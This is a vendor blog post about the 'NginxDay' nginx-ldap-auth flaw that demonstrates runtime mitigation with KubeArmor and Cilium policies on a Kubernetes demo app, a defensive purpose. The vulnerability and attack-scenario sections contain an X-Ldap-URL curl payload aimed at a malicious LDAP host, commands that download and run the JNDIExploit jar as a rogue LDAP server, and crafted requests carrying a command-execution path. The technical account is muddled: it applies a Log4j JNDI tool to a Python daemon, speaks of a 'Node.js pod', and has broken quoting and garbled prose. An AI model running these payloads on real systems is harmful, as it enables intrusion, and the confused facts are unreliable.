Introduction

A significant error with the Nginx-LDAP-auth software package was recently disclosed publicly, allowing attackers to avoid authenticity and disclose important information to the affected servers. This risk is still under investigation, so this blog post may be updated as more information becomes available. The latest update was, NGINX responding to this vulnerability with a blog post: Addressing Security Weaknesses in the NGINX LDAP Reference Implementation - NGINX

This weekend, information regarding the vulnerability was initially made public on Twitter, and since then, a GitHub repository has been set up to collect the data: NginxDay/README.md at main · AgainstTheWest/NginxDay

Starting with publicly accessible information, the AccuKnox Security team analyzed this issue, discovered the source of the vulnerability, and devised a workaround using AccuKnox open source tools. Before we get into that let us talk a bit about what Nginx and LDAP are.

NGINX and LDAP

Nginx (pronounced "engine X") is a reverse proxy, load balancer, mail proxy, and HTTP cache that may also be used as a reverse proxy. NGINX was originally designed to serve static files, but it has evolved into a full-featured web server capable of handling a wide range of server responsibilities. NGINX has eclipsed Apache in popularity because of its small footprint and ability to expand quickly on low-cost hardware.

Lightweight Directory Access Protocol (LDAP) is a protocol that makes it possible for applications to query user information quickly. Companies store usernames, passwords, email addresses, printer connections, and other static data. LDAP is an open, neutral vendor protocol for accessing and storing such data. LDAP can handle authentication, so users can log in once and access many different files on the server.

The Vulnerability

NGINX LDAP reference implementation uses LDAP to authorize users of applications provided by NGINX. The implementation of the reference was announced in June 2015. The solution uses the ngx_http_auth_request_module module (Auth Request) in NGINX and NGINX Plus, which transfers authentication requests to an external service. About using, that service is a daemon called LDAP-auth. It is written in Python and communicates with the LDAP authentication server.

Source: NGINX

If the administrator relies on the configuration that has been transferred to the nginx-ldap-auth daemon in the command line parameters instead of using representative_set_table in the configuration of Nginx, then the system is in danger.

An attacker can send an HTTP request through these modified HTTP Headers, which will then be forwarded to the nginx-ldap-auth daemon, which will use them with the LDAP protocol to determine if the credentials provided are valid.

The first attack (authorized bypassing and disclosure of information) involved specifying an X-Ldap-URL header containing a dangerous LDAP server value. On publicly displayed online servers this attack can be carried out in an unauthorized manner. This will cause the vulnerable system to become an application agent in the nginx-ldap-auth daemon to connect to an invading LDAP server. Assuming that the invader LDAP server is aggressively responding to every request, the attacker may log in to the administrator who has set up an official LDAP server and other information such as Base DN. This can lead to the significant authentication of any authentication user against the nginx-ldap-auth software. Depending on the target server and the situation, this problem may result in account recovery, resulting in the disclosure of personal information and further exploitation within the authorized user context.

The attack can be carried out using applications as simple as curl:

curl -H 'X-Ldap-URL: ldap://malicious.url.com' https://vulnerable-website 

Let us take an example and dig deep into the vulnerability

Setting up an Nginx app to demonstrate runtime security

We will demonstrate how to protect the Nginx application against such threats by implementing runtime security tools from AccuKnox. These will analyze the application and generate policies that can be enforced by Linux Security Modules (LSMs) like AppArmor and SELinux.

We’ll deploy a sample application to a Kubernetes environment and make use of AccuKnox open source tools to generate zero trust runtime security policies, apply them to the workload and make a comparison of the states before and after installing AccuKnox agents.

The scenario's purpose is to demonstrate how AccuKnox open source tools can be used to prevent “nginxday” zero-day vulnerability

Let's create a Kubernetes cluster

gcloud container clusters create sample-cluster --zone us-central1-c 

We will deploy a simple application that serves on port 80 and show the hostname once accessed.

Feel free to use the below deployment file to deploy the application to your k8s environment

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx
  labels:
    app: nginx
spec:
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
        - name: nginx18
          image: knoxuser/nginx18
          ports:
            - containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: nginx-svc
  name: nginx-svc
spec:
  ports:
    - name: "80"
      port: 80
      targetPort: 80
  selector:
    app: nginx
  type: LoadBalancer
Deployment file

You can also deploy the same file from accuknox/samples GitHub repository by copy-pasting the below command:

kubectl apply -f https://raw.githubusercontent.com/accuknox/samples/main/nginx-zeroday/k8s.yaml

This will create a deployment nginx and a service nginx-svc. We will take a look at whether the application is running and we have an external IP.

kubectl get pod, svc

NAME                              READY   STATUS    RESTARTS   AGE
pod/nginx-7f67bc45dc-jscb6        1/1     Running   0          85s

NAME                     TYPE           CLUSTER-IP     EXTERNAL-IP   PORT(S)        AGE
service/kubernetes       ClusterIP      10.44.0.1      <none>        443/TCP        6h27m
service/nginx-svc        LoadBalancer   10.44.12.105   34.135.54.3   80:30318/TCP   85s
Deployment NGINX

We have our application running and exposed to the public internet via port 80 with IP 34.135.54.3

For the complete code please refer to the accuknox/samples GitHub page

Runtime protection using AccuKnox Open-source tools

Accuknox enables the ability to protect your workloads at runtime. Accuknox enables this by allowing you to configure policies (or auto-discover them) for application and network behaviour using KubeArmor, Cilium, and Auto Policy Discovery tools

KubeArmor

KubeArmor, an open-source software that enables you to protect your cloud workload at runtime.

The problem that KubeArmor solves is that it can prevent cloud workloads from executing malicious activity at runtime.  Malicious activity can be any activity that the workload was not designed for or is not supposed to do.

Cilium

Cilium, an open-source project to provide eBPF-based networking, security, and observability for cloud-native environments such as Kubernetes clusters and other container orchestration platforms.

Auto Policy Discovery for your Nginx Application

Even though writing KubeArmor and CIlium (System and Network) policies are not a big challenge AccuKnox open source has it simplified one step further by introducing a new CLI tool for Auto Discovered Policies. The Auto-Discovery module helps users by identifying the flow and generating policies based on it.

Discovering policies has never been better with Auto Discovery. In two simple commands, you can set up and generate policies without having any trouble.

We will use AccuKnox Auto Discovered Policies to generate zero-trust runtime security policies to secure our workload.

The auto-discovered zero trust runtime security policies can be generated using two commands. We will have to deploy Cilium and KubeArmor to the cluster and use a MySQL pod to store the discovered policies from where they can be downloaded with a single command.

First, we will use the below command to install all prerequisites.

curl -s https://raw.githubusercontent.com/accuknox/tools/main/install.sh | bash

Once the command is run successfully it will install the following components to your cluster:

  • KubeArmor protection engine
  • Cilium CNI
  • Auto policy discovery engine
  • MySQL database to keep discovered policies
  • Hubble Relay and KubeArmor Relay

Once this is down we can invoke the second script file which will download the auto-discovered policies from the MySQL database and store them locally. For this we will issue the below command:

curl -s https://raw.githubusercontent.com/accuknox/tools/main/get_discovered_yamls.sh | bash

You should be able to see the following output.

{
  "res": "ok"
}
Got 59 cilium policies in file cilium_policies.yaml
{
  "res": "ok"
}
Got 1 kubearmor policies in file kubearmor_policies_default_default_nginx_bycnubnu.yaml
Got 1 kubearmor policies in file kubearmor_policies_default_explorer_knoxautopolicy_iwakqnyr.yaml
Got 1 kubearmor policies in file kubearmor_policies_default_explorer_mysql_zvbbfzqy.yaml
Command

In mere seconds after installing executing auto policy discovery tool, it generated 59 Cilium policies and 3 curated KubeArmor policies.

Let us take a look at some of the autodiscovery policies

CIlium Policy #1

apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: autopol-egress-gyipqtvnnrwyzmg
  namespace: default
spec:
  endpointSelector:
    matchLabels:
      app: nginx
  egress:
  - toEndpoints:
    - matchLabels:
        k8s-app: kube-dns
        k8s:io.kubernetes.pod.namespace: kube-system
    toPorts:
    - ports:
      - port: "53"
        protocol: UDP
Cilium policy 1

Cilium Policy #2

apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: autopol-egress-uhqpnyxadmphepg
  namespace: default
spec:
  endpointSelector:
    matchLabels:
      app: nginx
  egress:
  - toPorts:
    - ports:
      - port: "443"
        protocol: TCP
      - port: "80"
        protocol: TCP
Cilium policy 2

From Policy #1 and #2, we can see that there is only external communication from the Node.js pod via ports 53, 80, and 443, and port 53 is used to communicate to kube-dns only.

If we apply this policy it will make sure that the necessary communication via ports 53,80 and 443 are only happening thereby lowering the chances of any network-based attacks or communication happening from the Node.js pod to the external world.

KubeArmor Policy #1

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: autopol-default-nodejs-app
  namespace: default
spec:
  severity: 1
  selector:
    matchLabels:
      app: nginx
  process:
    matchPaths:
    - path: /bin/bash
    - path: /bin/cat
      fromSource:
      - path: /etc/init.d/procps
----------------------snip---------------------
    matchDirectories:
    - dir: /bin/
      fromSource:
      - path: /bin/sh
  file:
    matchPaths:
    - path: /bin/egrep
      fromSource:
      - path: /bin/grep
      - path: /usr/sbin/grep
----------------------snip---------------------
    matchDirectories:
    - dir: /
      fromSource:
      - path: /bin/bash
----------------------snip---------------------
    - dir: /usr/src/app/node_modules/
      fromSource:
      - path: /usr/local/bin/node
  network:
    matchProtocols:
    - protocol: raw
      fromSource:
      - path: /usr/bin/curl
----------------------snip---------------------
    - protocol: udp
      fromSource:
      - path: /usr/bin/curl
  action: Allow
---
KubeArmor Policy 1

The curated KubeArmor policy is a lengthy one that allows all system calls which are happing in a healthy environment ergo denying all other system calls from happening due to any external factors.

Let us apply all these auto-generated policies and safeguard our workload.

ls -la | awk '{print $9}'
.
..
cilium_policies.yaml
kubearmor_policies_default_default_nginx_bycnubnu.yaml
kubearmor_policies_default_explorer_knoxautopolicy_iwakqnyr.yaml
kubearmor_policies_default_explorer_mysql_zvbbfzqy.yaml
Auto discovered policies

We will apply the cilium_policies.yaml and kubearmor_policies_default_default_nginx_bycnubnu.yaml since both are related to the application nginx deployed on default the namespace.

kubectl apply -f cilium_policies.yaml -f kubearmor_policies_default_default_nginx_bycnubnu.yaml

ciliumnetworkpolicy.cilium.io/autopol-egress-gyipqtvnnrwyzmg created
ciliumnetworkpolicy.cilium.io/autopol-egress-uhqpnyxadmphepg created
kubearmorpolicy.security.kubearmor.com/autopol-default-nginx created
Apply policy

The Policies in action

It is time to verify whether we were able to achieve zero trust by using the auto-discovered policies generated by AccuKnox open source tools. To test this we will scan the application with some popular scanners.

Before that let us verify that the policies are applied correctly to the cluster

kubectl get cnp,ksp -A

NAMESPACE   NAME                                                           AGE
default     ciliumnetworkpolicy.cilium.io/autopol-egress-gyipqtvnnrwyzmg   26m
default     ciliumnetworkpolicy.cilium.io/autopol-egress-uhqpnyxadmphepg   25m

NAMESPACE   NAME                                                                AGE
default     kubearmorpolicy.security.kubearmor.com/autopol-default-nginx        14m
Applied Policies

Initiating the Attack scenario

The first step is to create a malicious LDAP server, to do that please follow these steps.

  1. Downloading malicious LDAP server
wget https://log4j-knox.s3.amazonaws.com/JNDIExploit-1.2-SNAPSHOT.jar

2. Starting LDAP Server for incoming traffic on your PC or Cloud VM

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i [<your-public-ip>]

We will initiate the attack by sending crafted requests to the application. Go to the application IP and give a query as ldap://152.70.67.139:1389/Basic/Command/hostname and watch the response received.

The complete request would look something like curl -H 'X-Ldap-URL: ldap://152.70.67.139:1389/Basic/Command/hostname 35.239.3.12

curl -H 'X-Ldap-URL: ldap://152.70.67.139:1389/Basic/Command/hostname 35.239.3.12

^c

The auto-discovered policies applied earlier are preventing the pod from communicating to other ports. ie, the port 1389.

We will delete the KubeArmor and CIlium policy and rerun the exploit and compare the state.

kubectl delete cnp --all    
   
ciliumnetworkpolicy.cilium.io "autopol-egress-gyipqtvnnrwyzmg" deleted
ciliumnetworkpolicy.cilium.io "autopol-egress-uhqpnyxadmphepg" deleted

kubectl delete ksp --all 

kubearmorpolicy.security.kubearmor.com "autopol-default-nginx" deleted
KubeArmor and CIlium policy

We will again go to the application IP and give the query ldap://152.70.67.139:1389/Basic/Command/hostname and watch the response received.

curl -H 'X-Ldap-URL: ldap://152.70.67.139:1389/Basic/Command/hostname 35.239.3.12

     javaClassName: foo 
     
     javaCodeBase: http://152.70.67.139:8080/ 
     
     objectClass: javaNamingReference 
     
     javaFactory: ExploitPDGjf0XUe6 

^c 
Exploit

We could see that the attack happened after we deleted the policies which were auto-discovered in a safe environment. This means applying the auto-discovered policies ensured that the “nginxday” was mitigated at runtime.

Accuknox's policy templates repository

Accuknox's policy templates is an open-source repo that also contains a wide range of attack prevention techniques including MITRE, as well as hardening techniques for your workloads. Please visit GitHub - kubearmor/policy-templates to download and apply policy templates.

Conclusion

Even though zero-day exploits are more brutal to avoid and protect from, with AccuKnox open source tools, you can prevent your workloads from possible threats and vulnerabilities until you can get a permanent solution from the vendor.

Using AccuKnox open-source tools, an organization can effectively protect against all sorts of accidental developer-introduced vulnerabilities and zero-day vulnerabilities even without having downtime or risky half-baked patches.